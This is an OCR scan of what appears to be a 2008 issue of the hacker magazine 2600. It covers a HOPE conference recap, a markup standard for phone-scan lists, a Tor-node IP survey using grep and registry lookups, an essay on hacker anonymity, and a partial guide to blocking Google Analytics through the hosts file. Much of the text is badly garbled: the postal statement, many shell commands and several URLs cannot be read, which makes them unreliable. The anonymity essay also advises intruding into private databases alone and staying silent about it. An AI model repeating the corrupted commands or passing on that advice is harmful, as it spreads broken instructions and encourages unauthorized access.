In the end, The Last HOPE turned out cool as it gets.

to be only the beginning. This year was definitely the biggest

Contrary to the perception that of them all with well-attended talks
this would be the actual last HOPE and constant activity around the clock
conference, the enthusiasm and spirit of in the hacker area downstairs. We also
the attendees, speakers, and staff made tried a lot of things for the first time:
such a prospect all but impossible. RFID badges, an imported and addictive
While many were fooled by all of German hacker drink, an onsite radio
the talk of the Hotel Pennsylvania's station, a "hacker space village, " and an
pending destruction along with unprecedented four speaker tracks. That,
various inadvertent symbols of death added to all of the existing activities
and hopelessness on our website, the (lockpicking, Segways, a huge network
intention was never to put an end to area, videos, merchants, etc.) that we
something that has proven to be such had brought back from previous HOPES,
a rallying point for the community. We made it virtually impossible to be bored
simply meant to use the word "last" to or to want to get any sleep.
denote "previous" or "most recent." We had a terrific keynote address from
So, the conference that occurred this Steven Levy, author of Hackers: Heroes
July was the last HOPE conference, as of the Computer Revolution (published
in the one that just happened. The next back in 1984), who was able to put the
one will appropriately be called The development of the hacker culture into a
Next HOPE and will take place in the perspective we could appreciate. Adam
summer of 201 O. Savage from Mythbusters also added his
We realize that this might get really sense of adventure and wonder to the
confusing in another two years when proceedingsasdid return i ngfavorites like
people use "Last" and "Next" without Jello Biafra, Kevin Mitnick, and Steven
actually meaning "last" and "next." But Rambam. But this doesn't even begin to
we still have some time to figure out scratch the surface. We had participants
how to fix that. For now, let us be happy from all age groups, backgrounds, and
with what happened this year. parts of the world in attendance and up
And what was that precisely? The on stage. If you were there, then you
one word answer is magic. We've don't need us to tell you how incredible
almost come to expect it after one of it was. And if you weren't, don't feel
our conferences. Each time we do this, too bad. You still have the DVDs, audio
we wind up sharing something really files, and something really cool to look
special and unique. Thousands of people forward to in two years.
gathering in the heart of Manhattan As with the magazine itself, we rely
for three days of fun and learning and solely on individuals like you to make
seeing for themselves what the hacker things happen. It's not a commercial
mentalitv is all about - that is about as operation filled with sronsors or
l
[
C 2%
[
ZnC
corporate grants. We like it that way
and we think it makes a lot of what
we do possible in the first place. That's
one reason you won't see a huge
publicity blitz complete with PR firms
luring attendees to find out "what
the hackers are up to." We find the
best rpsu Its come from those of you
who participate, telling others about
your experiences and w'tting more
cool people to show up. To those in
the commercial world, none of what
HOPE accomplishes is even possible.
To get so many people to show up and
volunteer their abi lities to turn an empty
space into a thriving community in the
course of a few hours just isn't realistic.
Nor is having so much content for such
a low admission price. Nor, for that
matter, is having a conference like this
right in the middle of New York City.
You could listen to such people tell
you for hours why this is an impossible
project and, no doubt, why so many
other idealistic endeavors simply don't
make any sense and are a big waste of
time to even think about. Obviously,
we're dealing with radically different
perceptions of reality, something which
should be kept in mind whenever you
pursue any dream. With determination
and a vision, there's little that can't
be accomplished. If HOPE teaches
us anyth i ng, it's to not I isten to the
naysayers and to do what we want
to do even if it's been defined by the
sensible as impossible. Isn't that what
hacking has always been? Doing those
things that you want to do, that the
mainstream will never appreciate or try
for themselves, just because you have a
feeling it could work. This applies both
on an individual and a collective scale
and it will continue to do so for as long
as the determination to succeed exists.
Plans are already in the works
for next year's outdoor conference
in the Netherlands, most likely to be
held in August. It's called Hacking
At Random or HAR. Updates will be
posted at http://har2009.org. If you
want to experience the fun and magic
of a HOPE conference and meet people
from all over the world, this is your best
opportunity until The Next HOPE.
Once again, we want to thank
everyone who made this summer a
lot of fun and a real milestone in the
hacker community. We have all of the
audio available for free download at
http://www.thelasthope.org and you can
buy the DVDs of any of the talks as well.
It'salso nevertooearlytostartplann ingfor
The Next HOPE. Our website is already
online at http://www.thenexthope.org.
It's hard to imagine how that one will
top th is one. Fortunately, the field of
imagination is one area where our
readers and attendees possess a great
degree of skill.
. . . . . . . . . ....... . . . . . . .. . . .......... . . ... . . . . .. . .. . ... . .
. .
. .
:
Stdl t` rll`nl "' '1uirt'r/ by I lise .\(B" showing tht`:
:()lwrship, Illdnagllll('nt, <me tirculation of l()()():
: Mdg,l/ill(', pub[ishCd '1u"rtt'r[y 1- issues) for October I,:
: 200B. Anmhl[ subscription price $20.0(). :
. .
:
!. MJiling ;tddr<'< of known officE of puhlication is
:
:
Box 752, Midd[e | s[dnd, Ntw York !I <r.L :
: 2. Mai[ing "ddrpss of til heddquarl ers or gener,,[:
:
business oilin" of tht' [lub[isht'r is 2 I-[owerlip[d,
:
:
!. j,lS, NY +[71Hl.
:
.
1. The names ;me .Vk lresses of the publisher, editor,
:
and managing editor arc: Publisher and Editor::
Emmanuel Goldstein, Box '', Middlf' Island, New:
York [ 1'5L Managing Editor: [ric Corley, 2 F[ow:
<rfie[d, SI. James, NY ++7BO :
: . The owner is Eric Corley. 2 F[owerfie[d, !. ja01es, :
: NYI17BO
.
: . Known honrholdprs, mortgagees, and other secu-
:
: rity holders owning or holding Illore than 1 percent
:
: or more of total amount of bonds, mortgages, or
:
:
other securities are: none.
:
. Extent and nature of circulation:
A. O!.\ lUDOCI OI IOj!t`

B
.muCOUDICI S.1tS
: 4!IDCI \JSS ^1!t'ODI1U_D IR' !`|

I 1IJ |'JJO JD|/OI KtQUI'Mt'O l !ICU.J!t1I1

: |: Ct' |!S!I!UIIOD y h1 DOIJUIStlt'IDC ^J
| ILI!I1-\t1UD!\
:
^J!!`O |DIO|1_D IDt' |S|
:
4IUISIOC IDC ^J!
l. OIU !ICt' O!MI!IOI1
l1OI1 O!!!I|J!Jt:I1
c.I!tj!t' DO! OISIi!L|h O
J:1I.I
:1. |cot'I1I |.!!O
,1! !|
1!! u1
48,12 16.1z
`.'1 | ,u
!4 !42
I2 .6
it !8
ti0
5,u0
'| '|
:
7. | certify that the statements made by me above are
:
: correct and complete.
:
:
(Signed) Eric Corley, Owner.
:
. .
. .
........................................................
ulumn 2d----------l
[
C 5
MIN
Markup Language
by dual
http://dualisanoob. com/
I ntroduction
Hand scanning is essential to phreaking, as
essential as punching and kicking are to martial
arts. Only after thousands and thousands of
punches and kicks can one build upon those
skills and create new techniques. Phreaking is
the same. After calling thousands and thousands
of numbers, one begins to notice sounds, routing,
systems, and intercepts that one wouldn't be
aware of otherwise.
Scanning is essential, and propagating the
knowledge gained from a scan is just as essen
tial. Otherwise, that knowledge is worthless
to the phreaking community. Presenting scan
information has been a complicated affair over
the years. Up to now, phreaks had to be sleuths
to determine accurate information, dealing with
incomplete scans, partial numbers, broken acro
nyms, and other shortcomings. Furthermore, so
much hand scan information is recorded, and
still remains, in paper notebooks to this day.
This article discusses a tool to assist phreaks
in the creation and dissemination of scan infor
mation: Bell's Mind Markup Language.
Bell's Mind Markup Language (BM2L) is the
standardization of hand scan presentation. Bell's
Mind Markup Language standardizes hand scan
layout, format, and number descriptions. The
standardized format that BM2L provides facili
tates efficient hand scan generation and assures
scan portability. Most importantly, BM2L solidi
fies the phreaking community, bringing dispa
rate data and new phreaks into the fold with a
common language and providing a record of
scans that can stand the test of time.
File Name Format. After the specification, appli
cation and BM2L's future conclude the article.
BM2l Specification
1 . File Name Format
BM2L requires the file name to have the
extension . scan. txt. This highlights the fact that
the file is an ASCii-text scan. it provides universal
acceptance across operating systems, web
servers and browsers. it also provides a standard
for other tools that expect a certain file name for
scans. Of course, it is helpful to humans as well,
letting them know that the file is indeed a hand
scan.
Phreaks are free to use any format for the file
name base, whether it is the numeric range of
the scan, a proper noun, or simply the phreak's
handle and an increment.
Examples: 800-555-xxxx. scan. txt,
pennsylvania. scan. txt
2. Number and Description Format
Scan entries should be in the format "NPA
NXX-XXXX - Description." This provides a
common, easily read format, includes the full
number for search tools like grep, and requires
number and description standardization for other
tools. Effort should be given to keep descriptions
to one line for automated tools as well, though
readabi I ity may necessitate wrapping. If a descrip
tion wraps, indent the next line to the beginning
of the description to maintain readability.
800-851-6662 - "Thank D I1 calling.
Due to extreme weather conditions,
we are unable to answer your call
at this time. Please try your call
again later."
808-973-4381 - Oahu forecast
The name Bell's Mind Markup Language 3. Standard Acronyms
comes from a website, Bell's Mindl. Bell's Mind These are the standard acronyms for
is a feature-rich website hosting an impres- commonly encountered numbers. Standard acro-
sive telecommunications database and other nyms are most often used by themselves, though
tools tailored for the phreak community. One they may be included as part of a larger descrip-
of the capabilities of Bell's Mind is its submis- tion. it is helpful to provide an acronym legend
sion engine for scanned numbers, of which there with scans, or at least to provide a legend of the
are over 30,000. BM2L not only pays homage acronyms used in the file.
to Bell's Mind, but also provides a standard for ANAC: Automatic Number Announcement
Bell's Mind number description and submission. Circuit
BM2L specifies the scan file name, phone CBCAD: Cannot Be Completed As Dialed
number, description, and other aspects of a CBCAE: Cannot Be Completed As Entered
scan. The BM2L specification is listed in eight CBRYCA: Cannot Be Reached from Your
numbered parts, much like an RFC. it begins with Calling Area
l
[
C

%
[
ZnC
DISCO: Disconnected
DTMF: Dual Tone Multi Frequency
HELO: "Hello?"
NAYCA: Not Available from Your Calling
Area
NIS: Not In Service
SIT: Special Information Tone
TT Y: Teletypewriter
VM: Voice Mail
Examples:
411 -/ 4- '99 - 'I'TY NIS TTY
808485-5555 - SIT "Code 4 8 Your cdll
has been connected Lo vacant nur1cr
series ... "
4. Standard Descri ptors
Standard descriptors are one-word descrip
tions of commonly and uncommonly encoun
tered numbers. In lower case, they are most often
used alone as the description of a number.
busy
carrier
extender
fax
milliwatt
reorder
ring out
silent
Examples:
505 )92-9996 |!w
623 6(-9994 !J:L
5. Secondary Phone Numbers
If a message reads another telephone number,
include that number in the description, within a
quote of the message or simply at the end of the
description. This provides a launching point for
further exploration and information for further
investigation.
Example:
800-483-6662 Verizon West lC LwCJ
M ClL1C! Center 97?-61-6200
6. Message and Tandem Codes
Message and tandem codes are included at
the end of descriptions within parentheses, for
example (027T). All tandem codes are capital
ized and spacing is included so as to match the
message.
Example:
50'-22"- 9901 - CHCAD (Leaeo message
M '0"-399)
7. Carri ers
When feasible, carrier connection data
should be displayed as the description. If this is
not possible, use the "carrier" standard descriptor
discussed earl ier.
Usel- Access Vcrifc_ion
Uernamc :
8. Other Numbers and Descri ptions
Numbers and descriptions that do not fit in
the above categories should be accounted for
with the phreak's best judgment as to ensure
readability, accessibility and maintainability.
Uti I ize the BM2 L standard as much as possible,
and make suggestions for changes to it, espe
cially when the special number or description is
repeatable.
Appl ications and BM2l' s Future
Tbere are a number of applications for BM2L.
For example, we can write our own syntax high
lighting for GNU ndno' that makes scans more
accessible and colorful. Carriers st,nd out as
brigbt yellow, for example. This demonstrates
that using an open standard allows for the most
personalization. An agreed-upon standard allows
tools and processes to be created for customiz
able uses.
Another example is number entry into a data
basf. The BM2L scan format allows the simple
creation of large scan databases. And, again,
what one can then do with a relational database
of thousands of scanned numbers is anyone's
guess. We can, for example, write a Perl script
that creates the SQL statements to enter scans
into a MySQL database.
Both of these example scripts are available
from the 2600 code repository. I have also made
available a Perl script, !:1OC1 .
'
, and a
website, l1:C l. net.", that generate BM2 L
compliant hand scan lists.
Suggestions have a I ready been made
to BM2L and updates will be maintained
in the Old Skool fhreaking section at the
Binary Revolution forums'. The addition of
"resident" and "business" standard descriptors
is being considered, to provide both discretion
regarding personally identifiable information and
d way to speed scanning. The standard descriptor
"pron" has also been suggested for obvious
reasons.
References
L L : / ' www . l l | 1 n O.I tL/ Lell
MM`1O'wC CC| .htm l
2hLtP://INWW.ToI1o-ec1iLoL.org/
.http://dudl- | oL . Cm/ l i n|1 / t1 ! /
M1lOC1. L L
4
!L L''www . llCCl.lCL '

! L L ' ' w w w . l l L C \ . C1/ ! C r U | /

MlO.l:lCw |C1`i
-
.
Examples:
281 230 3203 callier
The scripts mentioned in this article
0'- 4 1-9999 CONNECT 312001
can be downloaded from the
-ARQ/v341 I,AFM!V42BIS
2600 Code Repository at
QK''2
http://www2600.com/code/
ulumn 2d l
[
C 7
Uy OSIN
I sn't it a huge l eap to assu me that any
Tor router cou l d be associ ated wi t h t he
I n September, 2007, a Swedi sh secur i ty
US Goverment? I may not have defi ni t i ve
researcher reveal ed that he was abl e to
evi dence that any part i cu l ar Tor router i s
captu re unencrypted data by operat i ng exi t
associ ated wi t h t he NSA, but i f we use
nodes on the Tor networ k. Wi t h hi s setup, he
some common sense, we mi ght come up
wi t h some poss i bi l i t i es. For i nstance, a
was ahl e to sni ff usernames and passwor ds
search on the I nternet shows t he Ver i zonl
of accounts used by embassy offi ci al s and
Mel behemoth cur rent l y hol ds the l argest
corporate personnel . For t hose of us who
tel ecommuni cat i ons contract wi t h the US
have used Tor for years, t hi s is not earth-
Federal Goverment. Si nce I had al ready
shatter i ng news. In fact, the Tor webs i te goes
done a
q
u i ck, sampl ed search in the Tor
out of i ts way to remi nd users t hat Tor s houl d
fi l e whi ch hol ds a l i st i ng of t he routers and
not he rel i ed u pon for strong anonymi ty. Even
thei r I Ps, I found a name t hat stood out as
t hough communi cat i on among Tor nodes
I searched ARI N's records: Ver i zon I nternet
is encrypted, the connect i on is no l onger Servi ces.
automat i cal l y encrypted once you l eave t he Before I go on, l et's tal k about what
exi t node to vi s i t an exteral webs i te. Th i s
i s, for our purposes, t he most i mportant of
means that i f you l og i nto an account t hat
Tor's fi l es . When you fi rst start Tor, it bu i l ds
i s not us i ng SSH or HTTPS, you r traffi c can
a l i st i ng of al l part i ci pat i ng Tor nodes. Th i s
be sni ffed. As Tor becomes more known to
fi l e i s cal l ed !`!1. or, i n newer
the general publ i c, you can bet that there
vers i ons, !.1'1. Suppose t hat
wi l l be others who wi l l expl oi t users' l ack of
you ar e l ogged i n as " user" and you start Tor.
nderstandng B t t hs artcl e s not about
Then, the !1!: fi l e wi l l be pl aced
u | . O | | |
the fi ner detai l s of Tor.
you r home di rectory; in th i s exampl e, it wi l l
be cal l ed Ihomelw:erl. .!leached-routers.
A coupl e of years ago, I s ur mi sed t hat i f
I f you take a l ook i n that fi l e after stoppi ng
the NSA wanted to wi retap I nternet t raffi c
Tor, you' l l see a l ot of i nformat i on on t hose
t /55t, t hey mi ght do so at t he I nternet
nodes. I don't know what everyth i ng means
Exchange Poi nts (lXPs). You can read more
in t hat fi l e, but t h i s command wi l l gi ve you a
on that project at lll: /luI. gooci ties. e
oml
l i st of al l t he IP addresses part i ci pat i ng in t he
osin1776/. Br i efl y, an I XP i s a pl ace where
Tor network and the associ ated names:
many d i fferent I SPs exchange I nternet traffi c.
cat i!`:! . '!cached-rou ters
Of cou rse, any NSA rol e i n I XP traffi c sni ffi ng
. grep "router
H
tmp. txt
is spec u l at i on
on my part, but I doubt t hat
The space after t he word 'router' i s
ent i t i es s uch as t he FBI , DEA, NSA, and
i mportant . If you repl ace t he _1j command
DoD wou l d total l y i gnore s uch an easy
wi t h
w
e
--
you can get the number of Tor
access poi nt . Al so, I doubt t hat those same
nodes t hat were parti cipati ng at the t i me
ent i t i es cou l d fai l to noti ce Tor. Tor attracts
you started Tor. The f i l e is a t reasu re trove
of i nfor mat i on s uch as what as each node
a l ot of h acker-types, but now t hat t he
i s us i ng and how l ong each node has been
general popu l at i on is sta rti ng to noti ce t he
been up, but for our pu rposes we're onl y
system, i t wi l l i nevi tabl y attract el ements of
i nterested i n t he " router" l i ne.
cr i mi nal act i vi ty. The events of September
Getti ng back to Ver i zon, we can do
2007 spu r red a
q
uesti on i n my mi nd: who
a search on ARI N for "Veri zon Internet
is r unni ng the Tor exi t nodes, and where are
Servi ces" and get a l i st i ng of thei r s upposed I P
t hey l ocated? More speci fi cal l y, cou l d any
address space. I say supposed because ARI N
of t he Tor router I Ps be associ ated wi t h or somet i mes t r uncates the res u l ts i t ret urns t o
l ocated at t he same address as an I XP? t he browser. The fi rst entr
y
i n ARI N's records
la
[
C d
~~~~~~~~~~~~~~~~~~

%a
[
aZnC
for Veri zon I nternet Servi ces i s ......
..
....... We cou l d t hen run t hese

|- obvi ous t hat Veri zon does n't have al l

commands to see if any of t he Tor nodes fal l
that space, i t behooves you to search al l of i t,
wi th i n t h i s range: . .
cat /home/user/. tor/cached-routers '
Just I n case.

' ' gr'Op \ ... " The |l:'1 vari abl e i s ei t her ARI N, -grep rou ! , .
cat /home/user/. tor/cached-routers
APNI C, RI PE, LACNI C, or AFRI NI C, i n
-grep "router" grep \...
al l -capi tal l etters . As stated ear l i er, ARI N
Note t hat t he space before t he "64" i s
doesn't retur al l records al l t he t i me. And
needed. Al l these commands I ' m run n i ng just
i t's obvi ous t hat Veri zon i s n't ass i gned al l
seem t o be screami ng "Scr i pt me!" So, I 've
the address space l i sted i n veri zon/ver i zon.
created a scr i pt wh i ch wi l l do s ome of t he
t xt . So we can check that same fi l e agai nst
l eg work for you . It i s a Per l scr i pt and can be
t he other regi st r i es to see whi ch Tor I Ps are
downl oaded from the 2 600 code repos i tory.
l ocated i n those regi st r i es.
Let's t ur n our attent i on to t hi s scri pt, whi ch i s
When run n i ng t h i s scri pt agai nst Veri zon
cal l ed I . , [}
you wou l d use t hi s command:
The fi rst th i ng the scri pt does i s to set up a
. /pa '` .pi/hOlT"" / 'sey /.tor
. wgetrc fi Ie in t he home di rectory of t he user
% "ached !' | | l` .! /:!l
you're runni ng as. Th i s is one of t he pl aces
The scri pt uses
,1 to make a cal l to
you ' l l have to edi t t he scr i pt for your sel f.
t he regi stry, i n t hi s case ARI N, and creates
Then, you can r un the scri pt at the command
an HTML fi l e for each I P address i t tests.
l i ne l i ke t hi s:
After t he s cr i pt has r un, it is t r i vi al to run a
. !parse. pi r ',_1_| I
command to fi nd out how many Tor routers
- I !!_:(!:1:_:!_l Ircgistry]
mi ght be l i sted as fal l i ng under Ver i zon
You must create several di rector i es i n t he
I nternet Servi ces:
scri pt's worki ng d i rectory before proceedi

g
.
ed
t v
el ,,,).!! grcp
Si nceVeri zon is our exampl e these d l rectones
% "DrgName:" . grep `Cl.:" w |
wou l d be:
You can t hen l ook at each HTML fi l e to get
! i zon/
more i nformat i on as to what ARI N returned.
ver lzon/ A)IN
What were t he resu l ts of my test? I can't
veri zan/RIPE
b V ' I verizon/APNIC say anyth i ng concl usi ve, ut enzon nternet
veri zon/LACN I C
Servi ces is cons i stent l y l i sted as a host of
verizon/AFRTNIC
many nodes i n t he Tor network, usual l y
There are t hree vari abl es passed t o t he
havi ng 1 5- 25 nodes act i ve at a t i me. For al l
scri pt. tor_cache_fi le i s t he l ocat i on of t he
of t he I Ps I exami ned whi ch are regi stered
cached-routers fi l e. It is usual l y i n the
to Veri zon I nternet Servi ces, ARI N says t he
home/user/. tor di rectory of whatever user
address t hat was entered duri ng regi strat i on
you're l ogged i n at t he t i me.
i s 1 880 Campus Commons Dr., Reston,
The 1!_ill_LL_lJ fi l e l i sts t he
VA 201 91 . The i nterest i ng t h i ng i s t hat t he
major I P segments of an ent i ty, i

t h i

case
address above maps just down the road from
Veri zon, t hat we want to test against I n t he
t he l ocat i on l i sted for MCI 's MAE- East I XP
l i st of Tor routers i n t he CC!CO:COlC: fi l e.
fac i l i ty at Reston. I n fact, they're bot h wi th i n
As I ment i oned, not every l i sti ng for Veri zon
t he same area code. Duri ng my searches, I
comes up, so i t mi ght be better if we search
came across another ent i ty cal l ed ThePl anet.
t he ent i re range matc h i ng t he fi rst number i n
com. Th i s ent i ty had anywhere between
t he I P addresses of each ofVeri zon's entri es.
1 5- 30 nodes act i ve at a t i me, and al l t he I Ps
Here i s t he \C : 1 Cl/ \C : 1 Cl . L L segments
are l i sted by ARI N as bei ng near the same
fi l e I created for Veri zon :
address as t he Dal l as I nfoMart I XP run by
.
Swi t ch & Data, 1 950 Stemmons Freeway,
18.
Dal l as, TX. Keep i n mi nd t hat I have just 1.
1..
l ooked at a very t i ny port i on of t he Tor nodes
1.
t hat part i ci pate i n t he system at one t i me.
1..
But now I want to l ook at someth i ng el se:
11 .
what countri es mi ght be contri buti ng to t he
::.
d f
..
Tor system? Wel l , I 've been engrosse or
..
t he past several years i n mappi ng out t he
8.
I Pv4 address s pace for vari ous countri es.
4 .
J ust a coupl e of mont hs ago, I fi n i s hed t he
.
Mi ddl e East. You can see t he project at
Alumn 2d

l[
C 9
l L l : / / O . C C1 L 1 C . C C/ C 1 1 / .
Usi ng t he same concepts as wi t h Veri zan,
we can scan t he C!CO:COL Ct fi l e to see
if any Tor nodes map back to countri es we're
i nterested i n . Si nce most of t he Mi ddl e East
fal l s under RI PE, t hat i s the regi stry we' l l be
h i tt i ng. Dur i ng one scan, I found that I ran
had two nodes i n the Tor network; I srael ,
seven nodes; and the Uni ted Arab Emi rates,
two nodes.
Thus far, I 've l ooked just a smal l port i on
of t he total n umber of Tor routers t hat are out
t here. Wou l dn't i t be n i ce i f we cou l d get a
snapshot of every Tor node out t here? Not
bei ng one who can l eave wel l enough al one,
I deci ded to see if was poss i bl e to anal yze t he
ent i re Tor system at a gi ven poi nt i n t i me. So,
I set out to create a set of scri pts t hat do t h i s
very t h i ng for me. I uti l i ze a MysQL database
to store t he data, and I update t h i s database
rough l y every 2 0 mi nutes.
F i rst, my system's starter scri pt creates t he
:C!L C : . lL fi l e of al l the Tor nodes l i sted i n
t he C!CO:COlC: o r CClCOOC C:1 1C:
fi l e when Tor fi rst starts up. Then, for each
I P l i sted, t he scri pt fi rst checks to see if t hat
I P i s i n i ts database. If i t i s, then t he DATE
UPDATED fi el d i s updated to refl ect t he current
t i me, al l owi ng t hat entry to remai n on f i l e. I f
t he I P i s not i n the database, then t he scri pt
checks the ':!! returned by ARI N. The
ARI N '_d! l ets us know i f t he I P address i n
questi on i s assi gned by ARI N, or, al ternatel y,
whi ch regi stry we shou l d l ook i n If t he I P i s
not i n ARI N's juri s di ct i on, t hen t he scri pt wi l l
contact t he appropr i ate regi stry to get t he
i nformat i on we need. The scri pt r uns u nt i l
al l I Ps are checked. At t he end of t he r un,
ol d entri es i n t he database are removed, but
t he h i st or i cal lP record data gl eaned from t he
regi st r i es i s kept for future reference to speed
up t he process.
I have been run n i ng t he above set up
for a week now, and somet hi ng i nterest i ng
about t he Tor network has come t o l i ght.
Guess whi ch country i s host i ng t he most Tor
nodes. If you sai d t he Uni ted States, you are
wrong. I n fact the country t hat hosts the most
Tor nodes usual l y hosts more than the US,
Chi na, Russi a, and Great Br i tai n combi ned .
Whi ch country i s i t? Germany. That res ul t
seems t o remai n cons i stent no matter how
l ong I run my scri pts. Why Germany hosts
so many Tor nodes i s beyond me, and t he
number i s s urpri s i ngl y l arge. Usual l y, t hey
compri se nearl y a t h i rd of al l Tor nodes at
any gi ven t i me. I ' m at a l oss to expl ai n why
Germans are fl ocki ng to Tor. I t mi ght even
be t hat Germans t hemsel ves are unaware
of t hi s i nformat i on and t hat a forei gn power
i s be r un n i ng exi t Tor nodes i n Germany to
c i rcumvent t hat forei gn power's own l aws.
I ' l l l eave t he conspi racy t heor i es u p to t he
reader, but i f someone out t here knows why
Germany i s host i ng so many Tor nodes, I 'd
I i ke to hear i t .
The scripts mentioned i n this article
can be downloaded from the
2600 Code Repository at
http://www.2600.com/code/
1Ir 1A1r O] rrACr
AD rRW
by Barrett Brown
corporations. The US Secret Service's Operation
Sundevil brought about the end of the infancy of
Cyberspace has changed drastically in the
computer hacking.
past three decades, and hacker culture has
It is now almost twenty years later, and the
changed with it. In the beginning, we obfus-
current state of affairs includes the NSA sucking
cated our on-line identities with handles like
down all net traffic, Google retaining records
"h3 0" d "$ 3 @ " th t Id k
of all actions, ISPs pushing for a tiered Internet
r an up rm n so a we cou war
that they can manipulate, the EU implementing
with other hackers in cyberspace without our
security provisions, the Chinese government
true identities being discovered. Groups were
maintaining its "Great Firewall," and the FCC
formed, such as the Legion of Doom, Cult of
allowing very few entities to control the media
the Dead Cow, and LOpht. It was all fun and
landscape. The list goes on and on. Hacker
games, until people started to get hurt. Some
nicknames are a quaint anachronism, and the
hackers got busted and gave other members of
concept of a hacker group is destroyed. Still, we
their groups up to the authorities; some set up
find budding computer explorers christening
other hackers in order to avoid focusing trouble themselves "LOrd-pO OpOO@gmail. com"
on themselves; still others just plain sold out to while records of their home IP address and
la
[
C 2%a
[
aZnC
every search and email they ever send or receive to protected systems, using a botnet takes very
are retained. It is my opinion that nicks have little skill. It is largely rumored that botnet time
outlived their usefulness. These days, the only
can be easily purchased on the black market.
security comes in complete anonymity. Sorry,
The media initially framed this "cyberattack"
folks: no more clubs, no more bragging rights,
as an act of aggression from "Russian hackers."
and no more defaced web pages with "LOrd
They again popularized the image that we were
pOOpOO pwnd U" on them. Those days were
dealing with a massive international cyber
wonderful and fun, but their time has passed.
battle. Much later, a very small article came
Just using a nick is a red flag which gives hacker
out which traced the Estonia attack to a single
hunters something to search for, even if you
20-year-old Estonian college student. Was it
do so from different computers, through web
an act of government warfare, or was it one
proxies, with Tor, encrypted with your PCP key,
pissed-off college student? We may never know.
and on SILC. If continued secret communication
To date, no one has yet publicized who owns
with others is required, I recommend rotating
and control the botnets. Some bot herders of
media and using pass codes. The only safe and
small nets have been caught, but the herders of
useful hacker collaboration these days comes in
the largest nets still remain unseen. If the scant
the form of open and free communication on
C ts th,t 1 n

( h' J 1 n I f
media attention g iven t o these nets i s any clue,
pr Jec a ave 0 re, S( 0

|e . you
h d
we won't be finding out any time soon.
ave an intense esire to get into some private
.
database, you should do it alone. Once you've
8y the very nature of computer networks,
completed your task, never mention it again.
national borders are now blurred. When the
In 2003, the White House published
I nte
r
et was unleashed upon the world, it
The National Strategy to Secure Cyberspace,
cre,1ted a level playing field for all. We had truly
which presents cyberspace security as d fdcet
entered an age where a single person could
of Homeland Security. Not long after that, in
hdve the power to dffect an entire nation not
December, 2005, the United States Air Force
by voting, but by direct action. This must terrify
officially added "Cyberspace" to its area of
governments in the extreme, and lTany are
focus; in 2006, it set up the Air Force Cyber-
miking every effort to control the internet. These
space Command (AFCY8ER) to "provide both efforts include recruiting hackers that govprn-
defensive and offensive computer network ments catch, coercing hackers who work for
weapons." If you are getting visions of Black them to recruit others at events such as HOPE
I ce and Kuang Military Crade ic:ebreaking and IEFCON, and tricking hdckers into doing
programs from one of Gibson's novels, so am
work for them tbrough proprietary corporations
I, and there is no doubt that we are well on the
or I Re chit rooms.
way. This military command attempts to actively
I completely support hacker conVntions
monitor all attacks and scans upon government
and alwcYs enjoy them, but we must be aware
computers. Clearly, we are no longer living in
of whdt is occurring. Hackers have tbe direct
the age of fun nickna mes and clubs named after
power to change the world, dnd certain entities
comic book characters.
wish to monopolize and control th,t power. We
Since 2001, the US, UK, and German
communicate with each other in all countries
governments hdve reported that "Chinese
on an equal footing. We respect knowledge
hackers" are engaged in an active and system-
dnd information and disdain outmoded forms
atic frogram of computer system infiltration
I
.
01 contro . Our best detense is open collabo-
aimed at government computers, including the
ration in all fields; if executive measures must
unsecured e- mail of the US Secretary of Defense
be ta ken, then they should be taken alone and
and nuclear weapons laboratories. Because of
never shared with anotber.
the nature of computer networks, there really
's nc to I no hether Ch'nl

01
'
(1
I fJredict that government entities will
I w, Y V V | , IS |! V. vc
or not other than to use old-fashioned human
continue to intensify their media portrayals of
intelligence agents. Even if the computers
cyberspace as something divided into countries
which attacked these networks were located in
engaging in cyberbattle with (dcb other. Most
Chini, they could have been pwned by anyone,
citizens will believe these portrayals. We must
anywhere, including forces within the US witb
continue to educate our fellow humans about
a desire to frame China. Regardless of this fact,
open source software, loss of privacy, infor-
the hype circulating ,l110ng the l11ilitdry and
m<tion security, the tyranny of tiered I nternet
media makes it sound like we are in the middle
services, dnd the power that every individual
of the world's first Cyber Cold War.
h,S access to. I f we don't, we may wa ke up one
On another side of the Cyherwar frontier,
d,Y to find thdt we do not have internet freedom
we have the phenomena of botnets, whose any more.
power was witnessed in the massive DOSing of "PicaS muypt your cata, people. If you don'/,
Estonia in 2007, which was largely referred to as evil wifflake over the world."
Cyberwdr I. Unlike gaining unauthorized access 7omas jefferson, well-known Dutch Author
ulumn 2d
la
[
C
WATCHlnC
THE WATCH
by ZDtb
I ' m sure most 2600 readers are aware
of Googl e Anal yti cs. I t ' s a handy way for
websi te owners to see what thei r vi s i tors get
up to wi thout havi ng to l earn how to anal yze
Apache l og fi l es.
More paranoi d readers may have worked
out that Googl e has a l ot of i nformat i on at t hi s
poi nt. Usi ng Anal yti cs al one, they can keep
track of whi ch web pages peopl e l ook at, not
just on i ndi vi dual si tes but from one websi te to
the next. Th i s works if al l the si tes in questi on
use Anal yti cs, whi ch i ncreasi ngl y more web
devel opers are recommendi ng to thei r cl i ents
due to its ease of use.
As someone who val ues her pri vacy and
l i kes ti nkeri ng around wi t h computers, I
thought it wou l d be a fun l i ttl e project to
stop my computer from tal ki ng to Googl e
Anal yti cs. I t onl y takes a few mi nutes, and t he
effect wi l l l ast unt i l Googl e deci des t o change
the URL of t hei r JavaScri pt fi l e that keeps track
of peopl e browsi ng the web. Th i s wi l l prob
abl y be qu i te some t i me, as they' d need to tel l
a l ot of peopl e to update every page of t hei r
websi te.
Redi recti ng your browser
As you can see by si mpl y vi ewi ng the
HTML source of any si te that uses Googl e
Anal yti cs, t he program that keeps track of
your movements on the web i s avai l abl e at
http://www.google-analytics.com/
'urchin. j s, so you may want to tel l your
computer not to access that part i cu l ar domai n
name.
To do t hi s, edi t your / etc /hos ts fi l e,
whi ch keeps track of whi ch domai n names go
to whi ch I P addresses. ( I t's in a di fferent di rec
tory i n Wi ndows, but GNU/Li nux and OS X
users shou l d be abl e to pop open a termi nal
appl i cat i on and j ust start edi ti ng i t usi ng sudo
or su and the text edi tor of thei r choi ce. I f i n
doubt, search onl i ne for more detai l s.) Thi s i s
t he l i ne you need t o add:
Once you save t he fi l e, your computer wi l l
th i nk that any traffi c for that domai n name
shou l d go to i tsel f rather than to the real si te,
so it won' t actual l y tal k to the real Googl e
Anal yti cs server anymore.
Fi ndi ng out who uses Anal ytics
If you ' re runni ng an Apache webserver
and know how to set up domai n names on
it, t hi ngs get a l i ttl e bi t more fun. You can tel l
Apache that i t i s i ndeed the server that shou l d
recei ve requests for fi l es on that domai n name
by edi t i ng h t tpd. conf and setti ng up a
di rectory to host that domai n' s fi l es. If you ' re
